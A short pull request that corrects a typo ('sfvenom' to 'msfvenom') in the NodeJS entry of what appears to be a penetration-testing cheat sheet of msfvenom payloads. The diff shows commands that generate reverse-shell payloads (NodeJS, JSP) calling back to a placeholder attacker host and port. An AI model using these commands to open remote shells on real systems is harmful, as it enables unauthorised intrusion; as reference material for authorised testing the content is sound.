### PR TITLE
Fix NodeJS reverse shell

### DIFF
--- a/shells/shells/msfvenom.md
+++ b/shells/shells/msfvenom.md
@@ -140,7 +140,7 @@ msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f w
 ### NodeJS
 
 ```bash
-sfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
+msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
 ```
 
 ## **Script Language payloads**


### PR DESCRIPTION
Add a letter 'm' in front of "sfvenom" in NodeJS reverse shell.